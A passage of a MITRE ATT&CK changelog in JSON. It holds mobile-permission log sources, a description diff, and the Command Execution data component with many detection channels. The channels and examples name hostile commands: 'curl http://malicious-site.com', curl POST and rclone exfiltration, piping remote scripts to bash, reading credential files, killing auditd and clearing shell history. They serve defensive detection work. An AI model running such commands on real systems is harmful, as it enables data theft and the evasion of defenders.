for conditional execution (e.g., location/background modes) but observed behavior is deferred until target-specific state is present\"}, \"root['x_mitre_log_sources'][63]\": {\"name\": \"android:MDMLog\", \"channel\": \"application granted ACCESS_FINE_LOCATION and, when required for background operation, ACCESS_BACKGROUND_LOCATION + capability state sufficient for persistent geolocation monitoring before later guarded activity\"}, \"root['x_mitre_log_sources'][64]\": {\"name\": \"iOS:MDMLog\", \"channel\": \"application authorized for when-in-use or always location access and, where relevant, background execution capability sufficient for continued geographic evaluation before later guarded behavior\"}, \"root['x_mitre_log_sources'][65]\": {\"name\": \"android:MDMLog\", \"channel\": \"managed app inventory or launcher-visible state changes show application remains installed but user-facing entry point or launcher component becomes disabled before later runtime activity\"}, \"root['x_mitre_log_sources'][66]\": {\"name\": \"android:MDMLog\", \"channel\": \"installed application remains present while launcher-visible activity or component discoverability changes to hidden, disabled, or synthesized-settings-entry state prior to later runtime activity\"}, \"root['x_mitre_log_sources'][67]\": {\"name\": \"android:MDMLog\", \"channel\": \"change to security-relevant device configuration or managed policy (e.g., accessibility enablement, app admin changes, security service state change) preceding telemetry degradation\"}, \"root['x_mitre_log_sources'][68]\": {\"name\": \"android:MDMLog\", \"channel\": \"application enabled as device administrator, device owner, profile owner, or equivalent elevated management role before uninstall attempt\"}, \"root['x_mitre_log_sources'][69]\": {\"name\": \"android:MDMLog\", \"channel\": \"application granted accessibility service privileges capable of screen observation or global action invocation before removal attempt\"}, \"root['x_mitre_log_sources'][70]\": {\"name\": \"android:MDMLog\", \"channel\": \"application enabled as device administrator, device owner, or profile owner before screen-lock or password-control activity\"}, \"root['x_mitre_log_sources'][71]\": {\"name\": \"android:MDMLog\", \"channel\": \"application granted accessibility service privileges capable of intercepting UI flow or sustaining user-interaction denial before lockout event\"}, \"root['x_mitre_log_sources'][72]\": {\"name\": \"android:MDMLog\", \"channel\": \"device posture changes to rooted, non-compliant, weakened security state, or elevated control role becomes active before security-tool degradation\"}, \"root['x_mitre_log_sources'][73]\": {\"name\": \"android:MDMLog\", \"channel\": \"security-relevant application package state, enabled status, administrator state, or managed protection setting changes immediately before monitoring degradation\"}, \"root['x_mitre_log_sources'][74]\": {\"name\": \"android:MDMLog\", \"channel\": \"device posture or compromise-state indicators change unexpectedly, including rooted or non-compliant status disappearance, after prior app or system activity suggesting persistence on device\"}, \"root['x_mitre_log_sources'][75]\": {\"name\": \"android:MDMLog\", \"channel\": \"managed application state changes unexpectedly through uninstall, disappearance from expected inventory, or install-state mismatch after prior suspicious activity\"}, \"root['x_mitre_log_sources'][76]\": {\"name\": \"android:MDMLog\", \"channel\": \"application holds device-owner, profile-owner, or delegated app-management authority capable of package removal before uninstall event\"}, \"root['x_mitre_log_sources'][77]\": {\"name\": \"android:MDMLog\", \"channel\": \"application has accessibility service privileges immediately before package-removal UI flow and subsequent application disappearance\"}, \"root['x_mitre_log_sources'][78]\": {\"name\": \"android:MDMLog\", \"channel\": \"device posture indicates rooted, compromised, or non-compliant state before package files disappear without standard managed uninstall workflow\"}, \"root['x_mitre_log_sources'][79]\": {\"name\": \"android:MDMLog\", \"channel\": \"application holds device administrator, device owner, or other managed authority capable of wipe or destructive device-level action before bulk file loss or wipe event\"}, \"root['x_mitre_log_sources'][80]\": {\"name\": \"android:MDMLog\", \"channel\": \"device posture indicates rooted, compromised, or non-compliant state before protected or atypical filesystem deletion activity\"}}}",
                    "previous_version": "2.0",
                    "version_change": "2.0 \u2192 2.1",
                    "description_change_table": "\n    <table class=\"diff\" id=\"difflib_chg_to71__top\"\n           cellspacing=\"0\" cellpadding=\"0\" rules=\"groups\" >\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <colgroup></colgroup> <colgroup></colgroup> <colgroup></colgroup>\n        <thead><tr><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">Old Description</th><th class=\"diff_next\"><br /></th><th colspan=\"2\" class=\"diff_header\">New Description</th></tr></thead>\n        <tbody>\n            <tr><td class=\"diff_next\" id=\"difflib_chg_to71__0\"><a href=\"#difflib_chg_to71__top\">t</a></td><td class=\"diff_header\" id=\"from71_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_sub\">Permissions&nbsp;declared&nbsp;in&nbsp;an&nbsp;application's&nbsp;manifest&nbsp;or&nbsp;propert</span></td><td class=\"diff_next\"><a href=\"#difflib_chg_to71__top\">t</a></td><td class=\"diff_header\" id=\"to71_1\">1</td><td nowrap=\"nowrap\"><span class=\"diff_add\">Represents&nbsp;the&nbsp;permissions,&nbsp;entitlements,&nbsp;or&nbsp;capability&nbsp;gran</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_sub\">y&nbsp;list&nbsp;file</span></td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ts&nbsp;associated&nbsp;with&nbsp;a&nbsp;mobile&nbsp;application,&nbsp;including&nbsp;both&nbsp;perm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">issions&nbsp;declared&nbsp;by&nbsp;the&nbsp;application&nbsp;and&nbsp;those&nbsp;granted&nbsp;or&nbsp;req</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">uested&nbsp;during&nbsp;runtime.&nbsp;&nbsp;Monitoring&nbsp;permission&nbsp;state&nbsp;helps&nbsp;de</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">fenders&nbsp;identify&nbsp;applications&nbsp;attempting&nbsp;to&nbsp;access&nbsp;protected</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;device&nbsp;resources&nbsp;such&nbsp;as&nbsp;sensors,&nbsp;storage,&nbsp;communications&nbsp;i</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">nterfaces,&nbsp;or&nbsp;system&nbsp;services.&nbsp;&nbsp;Examples&nbsp;include:&nbsp;&nbsp;Android&nbsp;&nbsp;</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">-&nbsp;Permissions&nbsp;declared&nbsp;in&nbsp;AndroidManifest.xml&nbsp;-&nbsp;Runtime&nbsp;perm</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">ission&nbsp;prompts&nbsp;-&nbsp;Special&nbsp;access&nbsp;privileges&nbsp;(AccessibilitySer</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">vice,&nbsp;overlay,&nbsp;device&nbsp;admin)&nbsp;&nbsp;iOS&nbsp;&nbsp;-&nbsp;App&nbsp;entitlements&nbsp;in&nbsp;pro</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">visioning&nbsp;profiles&nbsp;-&nbsp;Privacy&nbsp;permission&nbsp;prompts&nbsp;-&nbsp;Capability</span></td></tr>\n            <tr><td class=\"diff_next\"></td><td class=\"diff_header\"></td><td nowrap=\"nowrap\">&nbsp;</td><td class=\"diff_next\"></td><td class=\"diff_header\">></td><td nowrap=\"nowrap\"><span class=\"diff_add\">&nbsp;grants&nbsp;for&nbsp;device&nbsp;services&nbsp;</span></td></tr>\n        </tbody>\n    </table>"
                },
                {
                    "type": "x-mitre-data-component",
                    "id": "x-mitre-data-component--685f917a-e95e-4ba0-ade1-c7d354dae6e0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2021-10-20 15:05:19.273000+00:00",
                    "modified": "2026-04-24 19:47:16.123000+00:00",
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/datacomponents/DC0064",
                            "external_id": "DC0064"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "name": "Command Execution",
                    "description": "Command Execution involves monitoring and capturing the execution of textual commands (including shell commands, cmdlets, and scripts) within an operating system or application. These commands may include arguments or parameters and are typically executed through interpreters such as `cmd.exe`, `bash`, `zsh`, `PowerShell`, or programmatic execution. Examples: \n\n- Windows Command Prompt\n    - dir \u2013 Lists directory contents.\n    - net user \u2013 Queries or manipulates user accounts.\n    - tasklist \u2013 Lists running processes.\n- PowerShell\n    - Get-Process \u2013 Retrieves processes running on a system.\n    - Set-ExecutionPolicy \u2013 Changes PowerShell script execution policies.\n    - Invoke-WebRequest \u2013 Downloads remote resources.\n- Linux Shell\n    - ls \u2013 Lists files in a directory.\n    - cat /etc/passwd \u2013 Reads the user accounts file.\n    - curl http://malicious-site.com \u2013 Retrieves content from a malicious URL.\n- Container Environments\n    - docker exec \u2013 Executes a command inside a running container.\n    - kubectl exec \u2013 Runs commands in Kubernetes pods.\n- macOS Terminal\n    - open \u2013 Opens files or URLs.\n    - dscl . -list /Users \u2013 Lists all users on the system.\n    - osascript -e \u2013 Executes AppleScript commands.",
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_log_sources": [
                        {
                            "name": "android:logcat",
                            "channel": "Command 'pm list packages' executed by app sandbox or child proc"
                        },
                        {
                            "name": "auditd:CONFIG_CHANGE",
                            "channel": "udev rule reload or trigger command executed"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve of script/interpreter (bash, python, node) with suspicious encoded or non-printable content"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Use of mv or cp to rename files with '.' prefix"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve: Execution of update-ca-certificates or trust anchor modification commands"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "gcore, gdb, strings, hexdump execution"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of auditctl, systemctl stop auditd, or kill -9 auditd"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of systemctl with subcommands start, stop, enable, disable"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of GUI-related binaries with suppressed window/display flags"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -X POST, wget --post-data"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "command line arguments containing lsblk, fdisk, parted"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "exec: Execution of dd, efibootmgr, or flashrom modifying firmware/boot partitions"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -d, wget --post-data"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "grep/cat/awk on files with password fields"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "git push, curl -X POST"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of gsettings set org.gnome.login-screen disable-user-list true"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execution of setfattr or getfattr commands"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Process execution of update-ca-certificates or openssl with suspicious arguments"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "Execution of chattr to set +i or +a attributes"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl or wget with POST/PUT options"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "curl -T, rclone copy"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve of curl,wget,bash,sh,python with piped or remote content"
                        },
                        {
                            "name": "auditd:EXECVE",
                            "channel": "execve, kill, ptrace, insmod, rmmod targeting security processes"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "proctitle contains chmod, chown, setfacl, or attr commands with suspicious parameters"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "proctitle contains chmod, chown, chgrp, setfacl, or attr with suspicious parameters (777, 755, +x, -R)"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "process title records containing discovery command sequences and environmental assessment patterns"
                        },
                        {
                            "name": "auditd:PROCTITLE",
                            "channel": "command-line execution patterns for system discovery utilities (uname, hostname, ifconfig, netstat, lsof, ps, mount)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of realmd, samba-tool, or ldapmodify with user-related arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of script interpreters by systemd timer (ExecStart)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands like systemctl stop <service>, service <service> stop, or kill -9 <pid>"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to locale, timedatectl, or cat /etc/timezone"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "sleep function usage or loops (nanosleep, usleep) in scripts"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "connect, execve, write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve call including 'nohup' or trailing '&'"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "None"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Commands executed within an SSH session where no matching logon/authentication event exists"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chmod, execve"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: iptables, nft, firewall-cmd modifications"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Invocation of scp, rsync, curl, or sftp"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls modifying local mail filter configuration files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: process_name IN (\"virsh\", \"VBoxManage\", \"qemu-img\") AND command IN (\"list\", \"info\")"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: service stop syslog, systemctl stop rsyslog, kill -9 syslog"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: openssl pkcs12, certutil, keytool"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Process in container namespace executes curl|wget|bash|sh|python|nc with outbound args"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of systemctl or service with enable/start parameters"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of cat, less, grep, journalctl targeting log directories (/var/log/)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of python, perl, or custom binaries invoking compression libraries"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve, USER_CMD"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "bash/zsh of base64, tar, gzip, or openssl immediately after file write"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Processes executing sendmail/postfix with forged headers"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of tar, gzip, bzip2, xz, zip, or openssl with compression/encryption arguments"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "promiscuous mode transitions (ioctl or ifconfig)"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "chattr, rm, shred, dd run on recovery directories or partitions"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of curl or wget writing files to /tmp/* followed by chmod or execution"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of downgraded interpreters such as python2 or forced fallback commands"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Command line arguments including SPApplicationsDataType"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of spoofing tools (e.g., hping3, nping, scapy) sending UDP packets to known amplifier ports"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of tools like cat, grep, or awk on credential files"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve of curl, rsync, wget with internal knowledge base or IPs"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of systemctl, loginctl, or systemd-inhibit commands related to sleep/hibernate"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of xev, xdotool, or input activity emulators"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of interpreters creating archive-like outputs without calling tar/gzip"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "Execution of insmod, modprobe, or rmmod commands by non-standard users or outside expected timeframes"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve syscalls for discovery commands (uname, hostname, id, whoami, ps, netstat, mount) with command-line parameter analysis"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of curl, wget, or custom scripts accessing financial endpoints"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of tar, gzip, bzip2, or openssl with output redirection"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve=/sbin/shutdown or /sbin/reboot"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls modifying HISTFILE or HISTCONTROL via unset/export"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve calls to /usr/bin/locale or shell execution of $LANG"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execution of systemctl or service with enable/start/modify"
                        },
                        {
                            "name": "auditd:SYSCALL",
                            "channel": "execve: Execution of lsmod, modinfo, or cat /proc/modules"
                        },
                        {
                            "name": "auditd:USER_CMD",
                            "channel": "USER_CMD"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "InvokeFunction"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "eventName: RunInstances, CreateUser, PutRolePolicy, InvokeCommand"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SSM RunCommand"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "GetLogEvents: High frequency log exports from CloudWatch or equivalent services"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "command-line execution invoking credential enumeration"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "ssm:GetCommandInvocation"
                        },
                        {
                            "name": "AWS:CloudTrail",
                            "channel": "SendCommand, StartSession, ExecuteCommand: Unexpected AWS Systems Manager command execution targeting EC2 instances"
                        },
                        {
                            "name": "azure:activity",
                            "channel": "Intune PowerShell Scripts"
                        },
                        {
                            "name": "azure:signinlogs",
                            "channel": "OperationName=SetDomainAuthentication OR Update-MsolFederatedDomain"
                        },
                        {
                            "name": "Command",
                            "channel": "None"
                        },
                        {
                            "name": "docker:api",
                            "channel": "docker logs access or container inspect commands from non-administrative users"
                        },
                        {
                            "name": "docker:daemon",
                            "channel": "docker exec or docker run with unexpected command/entrypoint"
                        },
                        {
                            "name": "docker:events",
                            "channel": "container exec rm|container stop --force"
                        },
                        {
                            "name": "ebpf:syscalls",
                            "channel": "useradd or /etc/passwd modified inside container"
                        },
                        {
                            "name": "EDR:AMSI",
                            "channel": "None"
                        },
                        {
                            "name": "EDR:cli",
                            "channel": "Command Line Telemetry"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "command execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "/var/log/hostd.log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "modification of config files or shell command execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "shell access or job registration"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "logline inspection"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "esxcli network firewall set commands"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "event stream"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "scp/ssh used to move file across hosts"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "esxcli system syslog config set or reload"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "command log"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Execution of '/bin/vmx' or modifications to '/etc/rc.local.d/local.sh'"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "Command Execution"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "remote CLI + vim-cmd logging"
                        },
                        {
                            "name": "esxi:hostd",
                            "channel": "execution + payload hints"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system syslog config set/reload, services.sh restart/stop"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "snapshot create/copy, esxcli"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "interactive shell"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "invoked remote scripts (esxcli)"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "base64 or gzip use within shell session"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "scripts or binaries with misleading names"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/var/log/shell.log entries containing \"esxcli system clock get\""
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "None"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "command IN (\"esxcli vm process list\", \"vim-cmd vmsvc/getallvms\")"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "openssl|tar|dd"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Execution of cat, tail, grep targeting /var/log/vmkernel.log or /var/log/hostd.log"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "CLI usage logs"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Command execution trace"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell command execution for chmod, chown, or file permission modification on VMFS or system files"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system syslog config set --loghost='' or stopping hostd service"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "Shell Access/Command Execution"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli software vib list"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "/root/.ash_history"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "mv, rename, or chmod commands moving VM files into hidden directories"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "`esxcli software vib install` with `--force` or `--no-sig-check` from shell history or `shell.log`"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "CLI session activity"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "esxcli system shutdown or reboot invoked"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "shell command execution for system discovery (vim-cmd, esxcli, vmware-cmd) targeting VM inventory and host configuration"
                        },
                        {
                            "name": "esxi:shell",
                            "channel": "unset HISTFILE or HISTFILESIZE modifications"
                        },
                        {
                            "name": "esxi:syslog",
                            "channel": "boot logs"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "/var/log/vmkernel.log"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "DCUI shell start, BusyBox activity"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "esxcli system account add"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "Unexpected restarts of management agents or shell access"
                        },
                        {
                            "name": "esxi:vmkernel",
                            "channel": "esxcli, vim-cmd invocation"
                        },
                        {
                            "name": "esxi:vobd",
                            "channel": "shell session start"
                        },
                        {
                            "name": "esxi:vpxd",
                            "channel": "vCenter Management"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "file system activity monitor"
                        },
                        {
                            "name": "fs:fsusage",
                            "channel": "access to BPF devices or interface IOCTLs"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "None"
                        },
                        {
                            "name": "gcp:audit",
                            "channel": "methodName: setIamPolicy, startInstance, createServiceAccount"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "Shell process (e.g., /bin/sh, /bin/bash) spawned in a container without an interactive session attached (i.e., automation anomaly)"
                        },
                        {
                            "name": "kubernetes:audit",
                            "channel": "process execution involving curl, grep, or awk on secrets"
                        },
                        {
                            "name": "linus:syslog",
                            "channel": "None"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "command logging"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "Shell history logs"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "Terminal Command History"
                        },
                        {
                            "name": "linux:cli",
                            "channel": "/home/*/.bash_history"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "Command-line includes base64 -d or openssl enc -d"
                        },
                        {
                            "name": "linux:osquery",
                            "channel": "process_events.command_line"
                        },
                        {
                            "name": "linux:shell",
                            "channel": "Manual invocation of software enumeration commands via interactive shell"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "cron activity"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Suspicious script or command execution targeting browser folders"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Unusual outbound transfers from CLI tools like base64, gzip, or netcat"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo chage|grep pam_pwquality|cat /etc/login.defs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sudo execution of ffmpeg/gst-launch/v4l2-ctl by non-standard user"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "sshd logs"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "CLI access to 'show running-config', 'show password', or 'cat config.txt'"
                        },
                        {
                            "name": "linux:syslog",
                            "channel": "Sudo or root escalation followed by filesystem mount commands"
                        },
                        {
                            "name": "linuxsyslog",
                            "channel": "nslcd or winbind logs"
                        },
                        {
                            "name": "m365:defender",
                            "channel": "Activity Log: Command Invocation"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Cmdlet: Get-GlobalAddressList, Get-Recipient"
                        },
                        {
                            "name": "m365:exchange",
                            "channel": "Get-RoleGroup, Get-DistributionGroup"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email triggers execution of mailbox-stored custom form"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email matches crafted rule trigger pattern tied to persistence logic"
                        },
                        {
                            "name": "m365:messagetrace",
                            "channel": "Inbound email triggering Outlook to auto-access folder tied to malicious Home Page"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Startup execution includes non-default component"
                        },
                        {
                            "name": "m365:office",
                            "channel": "Execution of unsigned macro from template"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Automated forwarding or file sync initiated by a logic app"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Search-Mailbox, Get-MessageTrace, eDiscovery requests"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, New-InboxRule"
                        },
                        {
                            "name": "m365:unified",
                            "channel": "Set-Mailbox, Set-MailboxPolicy, Set-TrustedLocation"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "Interpreter exec with suspicious arguments as above"
                        },
                        {
                            "name": "macos:osquery",
                            "channel": "launchd + process_events"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "system.log"
                        },
                        {
                            "name": "macos:syslog",
                            "channel": "/var/log/system.log"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "dsconfigad or dscl with create or append options for AD-bound users"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "launchctl unload, kill, or pkill commands affecting daemons or background services"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "execution of security-agent detection or enumeration commands"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of chflags hidden or SetFile -a V"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "defaults read -g AppleLocale, systemsetup -gettimezone"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "profiles install -type=configuration"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "log stream --predicate 'eventMessage contains \"loginwindow\" or \"pfctl\"'"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "exec or sudo usage with NOPASSWD context or echo modifying sudoers"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of /usr/bin/security add-trusted-cert or keychain modifications to System.keychain"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "nohup, disown, or osascript execution patterns"
                        },
                        {
                            "name": "macos:unifiedlog",
                            "channel": "Execution of 'profiles install -type=configuration'"
                        },
